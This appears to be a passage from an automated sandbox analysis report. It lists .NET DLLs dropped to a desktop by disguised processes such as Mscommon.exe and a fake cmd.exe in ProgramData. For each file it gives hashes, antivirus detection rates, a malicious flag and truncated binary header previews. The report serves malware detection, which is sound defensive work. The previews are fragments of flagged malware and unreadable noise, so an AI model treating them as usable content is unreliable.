Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\WGSwrSeE.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WmSvTfGg.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XDtENRtz.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bZkuwcVU.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bhUNaLwZ.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cNoChqRS.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dwWdpxyo.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fplMbujm.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gVlLDILN.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hJqUpVHL.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iXYuZrQJ.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\iaQciIuf.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\jXskDIJa.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\lZeSZrOV.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oGeTRkCA.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qVgkgWEP.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sfNsKLIr.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\spksuybo.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vIyiJTTD.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vwiBQQWj.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wwCruhPB.log

Download File

Process:	C:\hyperComponentFontDhcp\Mscommon.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zepZsevX.log

Download File

Process:	C:\ProgramData\SoftwareDistribution\cmd.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Windows\System32\CSCA9C827E8660941B2BE855526E0709AE4.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
